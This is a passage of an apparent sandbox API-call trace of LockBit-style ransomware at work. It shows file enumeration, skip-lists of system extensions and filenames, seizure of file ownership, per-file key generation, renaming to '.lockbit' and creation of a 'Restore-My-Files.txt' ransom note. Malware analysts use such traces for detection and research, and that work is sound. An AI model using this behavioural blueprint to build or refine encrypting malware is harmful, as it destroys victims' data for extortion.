SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6cf0c, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6cf0c) returned 1 [0076.798] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\fieldswitch.ax", SecurityInformation=0x1, pSecurityDescriptor=0x3d6cf0c) returned 1 [0076.798] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\fieldswitch.ax", SecurityInformation=0x4, pSecurityDescriptor=0x3d6cf0c) returned 1 [0076.798] CloseHandle (hObject=0x16c) returned 1 [0076.798] free (_Block=0x77d800) [0076.798] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\fieldswitch.ax" (normalized: "c:\\program files\\dvd maker\\fieldswitch.ax"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x16c [0076.798] CreateIoCompletionPort (FileHandle=0x16c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0076.798] malloc (_Size=0x40068) returned 0x1fb18c0 [0076.798] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=41472) returned 1 [0076.799] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.799] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.799] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0076.799] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.799] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.800] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0076.800] ReadFile (in: hFile=0x16c, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0076.805] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\fieldswitch.ax.lockbit", NtPathName=0x3d6d138, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\fieldswitch.ax.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0076.805] malloc (_Size=0x7a) returned 0x77de70 [0076.805] NtSetInformationFile (FileHandle=0x16c, IoStatusBlock=0x3d6cf04, FileInformation=0x77de70, Length=0x7a, FileInformationClass=0xa) returned 0x0 [0076.807] free (_Block=0x77de70) [0076.807] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\fieldswitch.ax" | out: pszPath="C:\\\\Program Files\\DVD Maker") returned 1 [0076.807] wsprintfW (in: param_1=0x3d6ccf0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Restore-My-Files.txt") returned 48 [0076.807] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0076.808] FindNextFileW (in: hFindFile=0x55fdb8, lpFindFileData=0x3d6d598 | out: lpFindFileData=0x3d6d598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0bdd9df, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0bdd9df, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0c03b3f, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xa800, dwReserved0=0x0, dwReserved1=0x0, cFileName="offset.ax", cAlternateFileName="")) returned 1 [0076.808] lstrcmpiW (lpString1=".", lpString2="offset.ax") returned -1 [0076.808] lstrcmpiW (lpString1="..", lpString2="offset.ax") returned -1 [0076.808] PathFindExtensionW (pszPath="offset.ax") returned=".ax" [0076.808] lstrcmpiW (lpString1=".386", lpString2=".ax") returned -1 [0076.808] lstrcmpiW (lpString1=".cmd", lpString2=".ax") returned 1 [0076.808] lstrcmpiW (lpString1=".exe", lpString2=".ax") returned 1 [0076.808] lstrcmpiW (lpString1=".ani", lpString2=".ax") returned -1 [0076.808] lstrcmpiW (lpString1=".adv", lpString2=".ax") returned -1 [0076.808] lstrcmpiW (lpString1=".theme", lpString2=".ax") returned 1 [0076.808] lstrcmpiW (lpString1=".msi", lpString2=".ax") returned 1 [0076.808] lstrcmpiW (lpString1=".msp", lpString2=".ax") returned 1 [0076.808] lstrcmpiW (lpString1=".com", lpString2=".ax") returned 1 [0076.808] lstrcmpiW (lpString1=".diagpkg", lpString2=".ax") returned 1 [0076.808] lstrcmpiW (lpString1=".nls", lpString2=".ax") returned 1 [0076.808] lstrcmpiW (lpString1=".diagcab", lpString2=".ax") returned 1 [0076.808] lstrcmpiW (lpString1=".lock", lpString2=".ax") returned 1 [0076.808] lstrcmpiW (lpString1=".ocx", lpString2=".ax") returned 1 [0076.808] lstrcmpiW (lpString1=".mpa", lpString2=".ax") returned 1 [0076.808] lstrcmpiW (lpString1=".cpl", lpString2=".ax") returned 1 [0076.808] lstrcmpiW (lpString1=".mod", lpString2=".ax") returned 1 [0076.808] lstrcmpiW (lpString1=".hta", lpString2=".ax") returned 1 [0076.808] lstrcmpiW (lpString1=".icns", lpString2=".ax") returned 1 [0076.809] lstrcmpiW (lpString1=".prf", lpString2=".ax") returned 1 [0076.809] lstrcmpiW (lpString1=".rtp", lpString2=".ax") returned 1 [0076.809] lstrcmpiW (lpString1=".diagcfg", lpString2=".ax") returned 1 [0076.809] lstrcmpiW (lpString1=".msstyles", lpString2=".ax") returned 1 [0076.809] lstrcmpiW (lpString1=".bin", lpString2=".ax") returned 1 [0076.809] lstrcmpiW (lpString1=".hlp", lpString2=".ax") returned 1 [0076.809] lstrcmpiW (lpString1=".shs", lpString2=".ax") returned 1 [0076.809] lstrcmpiW (lpString1=".drv", lpString2=".ax") returned 1 [0076.809] lstrcmpiW (lpString1=".wpx", lpString2=".ax") returned 1 [0076.809] lstrcmpiW (lpString1=".bat", lpString2=".ax") returned 1 [0076.809] lstrcmpiW (lpString1=".rom", lpString2=".ax") returned 1 [0076.809] lstrcmpiW (lpString1=".msc", lpString2=".ax") returned 1 [0076.809] lstrcmpiW (lpString1=".spl", lpString2=".ax") returned 1 [0076.809] lstrcmpiW (lpString1=".ps1", lpString2=".ax") returned 1 [0076.809] lstrcmpiW (lpString1=".msu", lpString2=".ax") returned 1 [0076.809] lstrcmpiW (lpString1=".ics", lpString2=".ax") returned 1 [0076.809] lstrcmpiW (lpString1=".key", lpString2=".ax") returned 1 [0076.809] lstrcmpiW (lpString1=".mp3", lpString2=".ax") returned 1 [0076.809] lstrcmpiW (lpString1=".reg", lpString2=".ax") returned 1 [0076.809] lstrcmpiW (lpString1=".dll", lpString2=".ax") returned 1 [0076.809] lstrcmpiW (lpString1=".ini", lpString2=".ax") returned 1 [0076.809] lstrcmpiW (lpString1=".idx", lpString2=".ax") returned 1 [0076.809] lstrcmpiW (lpString1=".sys", lpString2=".ax") returned 1 [0076.809] lstrcmpiW (lpString1=".hlp", lpString2=".ax") returned 1 [0076.809] lstrcmpiW (lpString1=".ico", lpString2=".ax") returned 1 [0076.809] lstrcmpiW (lpString1=".lnk", lpString2=".ax") returned 1 [0076.809] lstrcmpiW (lpString1=".rdp", lpString2=".ax") returned 1 [0076.810] lstrcmpiW (lpString1=".lockbit", lpString2=".ax") returned 1 [0076.810] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="offset.ax") returned 1 [0076.810] lstrcmpiW (lpString1="ntldr", lpString2="offset.ax") returned -1 [0076.810] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="offset.ax") returned -1 [0076.810] lstrcmpiW (lpString1="bootsect.bak", lpString2="offset.ax") returned -1 [0076.810] lstrcmpiW (lpString1="autorun.inf", lpString2="offset.ax") returned -1 [0076.810] lstrcmpiW (lpString1="thumbs.db", lpString2="offset.ax") returned 1 [0076.810] lstrcmpiW (lpString1="iconcache.db", lpString2="offset.ax") returned -1 [0076.810] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker" | out: pszPath="C:\\\\Program Files\\DVD Maker\\") returned="" [0076.810] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\offset.ax") returned=".ax" [0076.810] lstrcmpiW (lpString1=".rar", lpString2=".ax") returned 1 [0076.810] lstrcmpiW (lpString1=".zip", lpString2=".ax") returned 1 [0076.810] lstrcmpiW (lpString1=".7z", lpString2=".ax") returned -1 [0076.810] lstrcmpiW (lpString1=".ckp", lpString2=".ax") returned 1 [0076.810] lstrcmpiW (lpString1=".dacpac", lpString2=".ax") returned 1 [0076.810] lstrcmpiW (lpString1=".db", lpString2=".ax") returned 1 [0076.810] lstrcmpiW (lpString1=".db-shm", lpString2=".ax") returned 1 [0076.810] lstrcmpiW (lpString1=".db-wal", lpString2=".ax") returned 1 [0076.810] lstrcmpiW (lpString1=".db3", lpString2=".ax") returned 1 [0076.810] lstrcmpiW (lpString1=".dbf", lpString2=".ax") returned 1 [0076.810] lstrcmpiW (lpString1=".dbc", lpString2=".ax") returned 1 [0076.810] lstrcmpiW (lpString1=".dbs", lpString2=".ax") returned 1 [0076.810] lstrcmpiW (lpString1=".dbt", lpString2=".ax") returned 1 [0076.810] lstrcmpiW (lpString1=".dbv", lpString2=".ax") returned 1 [0076.810] lstrcmpiW (lpString1=".frm", lpString2=".ax") returned 1 [0076.810] lstrcmpiW (lpString1=".mdf", lpString2=".ax") returned 1 [0076.811] lstrcmpiW (lpString1=".mrg", lpString2=".ax") returned 1 [0076.811] lstrcmpiW (lpString1=".mwb", lpString2=".ax") returned 1 [0076.811] lstrcmpiW (lpString1=".myd", lpString2=".ax") returned 1 [0076.811] lstrcmpiW (lpString1=".ndf", lpString2=".ax") returned 1 [0076.811] lstrcmpiW (lpString1=".qry", lpString2=".ax") returned 1 [0076.811] lstrcmpiW (lpString1=".sdb", lpString2=".ax") returned 1 [0076.811] lstrcmpiW (lpString1=".sdf", lpString2=".ax") returned 1 [0076.811] lstrcmpiW (lpString1=".sql", lpString2=".ax") returned 1 [0076.811] lstrcmpiW (lpString1=".sqlite", lpString2=".ax") returned 1 [0076.811] lstrcmpiW (lpString1=".sqlite3", lpString2=".ax") returned 1 [0076.811] lstrcmpiW (lpString1=".sqlitedb", lpString2=".ax") returned 1 [0076.811] lstrcmpiW (lpString1=".tmd", lpString2=".ax") returned 1 [0076.811] wsprintfW (in: param_1=0x3d6cae0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\offset.ax.lockbit") returned 45 [0076.811] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\offset.ax" (normalized: "c:\\program files\\dvd maker\\offset.ax"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0076.812] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0076.812] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0076.812] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0076.812] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0076.812] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0076.812] RtlFreeAnsiString (AnsiString="\\") [0076.812] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6d158 | out: TokenHandle=0x3d6d158*=0x16c) returned 0x0 [0076.813] malloc (_Size=0x200) returned 0x77d800 [0076.813] NtQueryInformationToken (in: TokenHandle=0x16c, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6d150 | out: TokenInformation=0x77d800, ReturnLength=0x3d6d150) returned 0x0 [0076.813] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6cf0c, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6cf0c) returned 1 [0076.813] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6cf0c, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6cf0c) returned 1 [0076.813] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\offset.ax", SecurityInformation=0x1, pSecurityDescriptor=0x3d6cf0c) returned 1 [0076.813] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\offset.ax", SecurityInformation=0x4, pSecurityDescriptor=0x3d6cf0c) returned 1 [0076.813] CloseHandle (hObject=0x16c) returned 1 [0076.813] free (_Block=0x77d800) [0076.814] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\offset.ax" (normalized: "c:\\program files\\dvd maker\\offset.ax"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x16c [0076.814] CreateIoCompletionPort (FileHandle=0x16c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0076.814] malloc (_Size=0x40068) returned 0x1fb18c0 [0076.814] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=43008) returned 1 [0076.814] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.814] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.814] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0076.814] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0076.815] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0076.815] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0076.815] ReadFile (in: hFile=0x16c, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0076.820] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\offset.ax.lockbit", NtPathName=0x3d6d138, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\offset.ax.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0076.820] malloc (_Size=0x70) returned 0x77d800 [0076.820] NtSetInformationFile (FileHandle=0x16c, IoStatusBlock=0x3d6cf04, FileInformation=0x77d800, Length=0x70, FileInformationClass=0xa) returned 0x0 [0076.823] free (_Block=0x77d800) [0076.823] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\offset.ax" | out: pszPath="C:\\\\Program Files\\DVD Maker") returned 1 [0076.823] wsprintfW (in: param_1=0x3d6ccf0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Restore-My-Files.txt") returned 48 [0076.823] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0076.823] FindNextFileW (in: hFindFile=0x55fdb8, lpFindFileData=0x3d6d598 | out: lpFindFileData=0x3d6d598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0c03b3f, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0c03b3f, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0eb1404, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xe46400, dwReserved0=0x0, dwReserved1=0x0, cFileName="OmdBase.dll", cAlternateFileName="")) returned 1 [0076.823] lstrcmpiW (lpString1=".", lpString2="OmdBase.dll") returned -1 [0076.823] lstrcmpiW (lpString1="..", lpString2="OmdBase.dll") returned -1 [0076.823] PathFindExtensionW (pszPath="OmdBase.dll") returned=".dll" [0076.823] lstrcmpiW (lpString1=".386", lpString2=".dll") returned -1 [0076.823] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0076.824] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0076.824] lstrcmpiW (lpString1=".ani", lpString2=".dll") returned -1 [0076.824] lstrcmpiW (lpString1=".adv", lpString2=".dll") returned -1 [0076.824] lstrcmpiW (lpString1=".theme", lpString2=".dll") returned 1 [0076.824] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0076.824] lstrcmpiW (lpString1=".msp", lpString2=".dll") returned 1 [0076.824] lstrcmpiW (lpString1=".com", lpString2=".dll") returned -1 [0076.824] lstrcmpiW (lpString1=".diagpkg", lpString2=".dll") returned -1 [0076.824] lstrcmpiW (lpString1=".nls", lpString2=".dll") returned 1 [0076.824] lstrcmpiW (lpString1=".diagcab", lpString2=".dll") returned -1 [0076.824] lstrcmpiW (lpString1=".lock", lpString2=".dll") returned 1 [0076.824] lstrcmpiW (lpString1=".ocx", lpString2=".dll") returned 1 [0076.824] lstrcmpiW (lpString1=".mpa", lpString2=".dll") returned 1 [0076.824] lstrcmpiW (lpString1=".cpl", lpString2=".dll") returned -1 [0076.824] lstrcmpiW (lpString1=".mod", lpString2=".dll") returned 1 [0076.824] lstrcmpiW (lpString1=".hta", lpString2=".dll") returned 1 [0076.824] lstrcmpiW (lpString1=".icns", lpString2=".dll") returned 1 [0076.824] lstrcmpiW (lpString1=".prf", lpString2=".dll") returned 1 [0076.824] lstrcmpiW (lpString1=".rtp", lpString2=".dll") returned 1 [0076.824] lstrcmpiW (lpString1=".diagcfg", lpString2=".dll") returned -1 [0076.824] lstrcmpiW (lpString1=".msstyles", lpString2=".dll") returned 1 [0076.824] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0076.824] lstrcmpiW (lpString1=".hlp", lpString2=".dll") returned 1 [0076.825] lstrcmpiW (lpString1=".shs", lpString2=".dll") returned 1 [0076.825] lstrcmpiW (lpString1=".drv", lpString2=".dll") returned 1 [0076.825] lstrcmpiW (lpString1=".wpx", lpString2=".dll") returned 1 [0076.825] lstrcmpiW (lpString1=".bat", lpString2=".dll") returned -1 [0076.825] lstrcmpiW (lpString1=".rom", lpString2=".dll") returned 1 [0076.825] lstrcmpiW (lpString1=".msc", lpString2=".dll") returned 1 [0076.825] lstrcmpiW (lpString1=".spl", lpString2=".dll") returned 1 [0076.825] lstrcmpiW (lpString1=".ps1", lpString2=".dll") returned 1 [0076.825] lstrcmpiW (lpString1=".msu", lpString2=".dll") returned 1 [0076.825] lstrcmpiW (lpString1=".ics", lpString2=".dll") returned 1 [0076.825] lstrcmpiW (lpString1=".key", lpString2=".dll") returned 1 [0076.825] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0076.825] lstrcmpiW (lpString1=".reg", lpString2=".dll") returned 1 [0076.825] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0076.825] FindNextFileW (in: hFindFile=0x55fdb8, lpFindFileData=0x3d6d598 | out: lpFindFileData=0x3d6d598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0efd6c5, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0efd6c5, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb102e1c7, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x432600, dwReserved0=0x0, dwReserved1=0x0, cFileName="OmdProject.dll", cAlternateFileName="")) returned 1 [0076.825] lstrcmpiW (lpString1=".", lpString2="OmdProject.dll") returned -1 [0076.825] lstrcmpiW (lpString1="..", lpString2="OmdProject.dll") returned -1 [0076.825] PathFindExtensionW (pszPath="OmdProject.dll") returned=".dll" [0076.825] lstrcmpiW (lpString1=".386", lpString2=".dll") returned -1 [0076.825] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0076.825] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0076.825] lstrcmpiW (lpString1=".ani", lpString2=".dll") returned -1 [0076.825] lstrcmpiW (lpString1=".adv", lpString2=".dll") returned -1 [0076.825] lstrcmpiW (lpString1=".theme", lpString2=".dll") returned 1 [0076.826] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0076.826] lstrcmpiW (lpString1=".msp", lpString2=".dll") returned 1 [0076.826] lstrcmpiW (lpString1=".com", lpString2=".dll") returned -1 [0076.826] lstrcmpiW (lpString1=".diagpkg", lpString2=".dll") returned -1 [0076.826] lstrcmpiW (lpString1=".nls", lpString2=".dll") returned 1 [0076.826] lstrcmpiW (lpString1=".diagcab", lpString2=".dll") returned -1 [0076.826] lstrcmpiW (lpString1=".lock", lpString2=".dll") returned 1 [0076.826] lstrcmpiW (lpString1=".ocx", lpString2=".dll") returned 1 [0076.826] lstrcmpiW (lpString1=".mpa", lpString2=".dll") returned 1 [0076.826] lstrcmpiW (lpString1=".cpl", lpString2=".dll") returned -1 [0076.826] lstrcmpiW (lpString1=".mod", lpString2=".dll") returned 1 [0076.826] lstrcmpiW (lpString1=".hta", lpString2=".dll") returned 1 [0076.826] lstrcmpiW (lpString1=".icns", lpString2=".dll") returned 1 [0076.826] lstrcmpiW (lpString1=".prf", lpString2=".dll") returned 1 [0076.826] lstrcmpiW (lpString1=".rtp", lpString2=".dll") returned 1 [0076.826] lstrcmpiW (lpString1=".diagcfg", lpString2=".dll") returned -1 [0076.826] lstrcmpiW (lpString1=".msstyles", lpString2=".dll") returned 1 [0076.826] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0076.826] lstrcmpiW (lpString1=".hlp", lpString2=".dll") returned 1 [0076.826] lstrcmpiW (lpString1=".shs", lpString2=".dll") returned 1 [0076.826] lstrcmpiW (lpString1=".drv", lpString2=".dll") returned 1 [0076.826] lstrcmpiW (lpString1=".wpx", lpString2=".dll") returned 1 [0076.826] lstrcmpiW (lpString1=".bat", lpString2=".dll") returned -1 [0076.826] lstrcmpiW (lpString1=".rom", lpString2=".dll") returned 1 [0076.827] lstrcmpiW (lpString1=".msc", lpString2=".dll") returned 1 [0076.827] lstrcmpiW (lpString1=".spl", lpString2=".dll") returned 1 [0076.827] lstrcmpiW (lpString1=".ps1", lpString2=".dll") returned 1 [0076.827] lstrcmpiW (lpString1=".msu", lpString2=".dll") returned 1 [0076.827] lstrcmpiW (lpString1=".ics", lpString2=".dll") returned 1 [0076.827] lstrcmpiW (lpString1=".key", lpString2=".dll") returned 1 [0076.827] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0076.827] lstrcmpiW (lpString1=".reg", lpString2=".dll") returned 1 [0076.827] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0076.827] FindNextFileW (in: hFindFile=0x55fdb8, lpFindFileData=0x3d6d598 | out: lpFindFileData=0x3d6d598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5ad52b0, ftCreationTime.dwHighDateTime=0x1d5cd17, ftLastAccessTime.dwLowDateTime=0x46df2e90, ftLastAccessTime.dwHighDateTime=0x1d5cac4, ftLastWriteTime.dwLowDateTime=0x46df2e90, ftLastWriteTime.dwHighDateTime=0x1d5cac4, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x0, dwReserved1=0x0, cFileName="perspectivesimagineclassics.exe", cAlternateFileName="PERSPE~1.EXE")) returned 1 [0076.827] lstrcmpiW (lpString1=".", lpString2="perspectivesimagineclassics.exe") returned -1 [0076.827] lstrcmpiW (lpString1="..", lpString2="perspectivesimagineclassics.exe") returned -1 [0076.827] PathFindExtensionW (pszPath="perspectivesimagineclassics.exe") returned=".exe" [0076.827] lstrcmpiW (lpString1=".386", lpString2=".exe") returned -1 [0076.827] lstrcmpiW (lpString1=".cmd", lpString2=".exe") returned -1 [0076.827] lstrcmpiW (lpString1=".exe", lpString2=".exe") returned 0 [0076.827] FindNextFileW (in: hFindFile=0x55fdb8, lpFindFileData=0x3d6d598 | out: lpFindFileData=0x3d6d598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0b6b5be, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb0b6b5be, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb0bb787f, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1c4600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pipeline.dll", cAlternateFileName="")) returned 1 [0076.827] lstrcmpiW (lpString1=".", lpString2="Pipeline.dll") returned -1 [0076.827] lstrcmpiW (lpString1="..", lpString2="Pipeline.dll") returned -1 [0076.827] PathFindExtensionW (pszPath="Pipeline.dll") returned=".dll" [0076.827] lstrcmpiW (lpString1=".386", lpString2=".dll") returned -1 [0076.827] lstrcmpiW (lpString1=".cmd", lpString2=".dll") returned -1 [0076.827] lstrcmpiW (lpString1=".exe", lpString2=".dll") returned 1 [0076.827] lstrcmpiW (lpString1=".ani", lpString2=".dll") returned -1 [0076.827] lstrcmpiW (lpString1=".adv", lpString2=".dll") returned -1 [0076.828] lstrcmpiW (lpString1=".theme", lpString2=".dll") returned 1 [0076.828] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0076.828] lstrcmpiW (lpString1=".msp", lpString2=".dll") returned 1 [0076.828] lstrcmpiW (lpString1=".com", lpString2=".dll") returned -1 [0076.828] lstrcmpiW (lpString1=".diagpkg", lpString2=".dll") returned -1 [0076.828] lstrcmpiW (lpString1=".nls", lpString2=".dll") returned 1 [0076.828] lstrcmpiW (lpString1=".diagcab", lpString2=".dll") returned -1 [0076.828] lstrcmpiW (lpString1=".lock", lpString2=".dll") returned 1 [0076.828] lstrcmpiW (lpString1=".ocx", lpString2=".dll") returned 1 [0076.828] lstrcmpiW (lpString1=".mpa", lpString2=".dll") returned 1 [0076.828] lstrcmpiW (lpString1=".cpl", lpString2=".dll") returned -1 [0076.828] lstrcmpiW (lpString1=".mod", lpString2=".dll") returned 1 [0076.828] lstrcmpiW (lpString1=".hta", lpString2=".dll") returned 1 [0076.828] lstrcmpiW (lpString1=".icns", lpString2=".dll") returned 1 [0076.828] lstrcmpiW (lpString1=".prf", lpString2=".dll") returned 1 [0076.828] lstrcmpiW (lpString1=".rtp", lpString2=".dll") returned 1 [0076.828] lstrcmpiW (lpString1=".diagcfg", lpString2=".dll") returned -1 [0076.828] lstrcmpiW (lpString1=".msstyles", lpString2=".dll") returned 1 [0076.828] lstrcmpiW (lpString1=".bin", lpString2=".dll") returned -1 [0076.828] lstrcmpiW (lpString1=".hlp", lpString2=".dll") returned 1 [0076.828] lstrcmpiW (lpString1=".shs", lpString2=".dll") returned 1 [0076.828] lstrcmpiW (lpString1=".drv", lpString2=".dll") returned 1 [0076.828] lstrcmpiW (lpString1=".wpx", lpString2=".dll") returned 1 [0076.828] lstrcmpiW (lpString1=".bat", lpString2=".dll") returned -1 [0076.829] lstrcmpiW (lpString1=".rom", lpString2=".dll") returned 1 [0076.829] lstrcmpiW (lpString1=".msc", lpString2=".dll") returned 1 [0076.829] lstrcmpiW (lpString1=".spl", lpString2=".dll") returned 1 [0076.829] lstrcmpiW (lpString1=".ps1", lpString2=".dll") returned 1 [0076.829] lstrcmpiW (lpString1=".msu", lpString2=".dll") returned 1 [0076.829] lstrcmpiW (lpString1=".ics", lpString2=".dll") returned 1 [0076.829] lstrcmpiW (lpString1=".key", lpString2=".dll") returned 1 [0076.829] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0076.829] lstrcmpiW (lpString1=".reg", lpString2=".dll") returned 1 [0076.829] lstrcmpiW 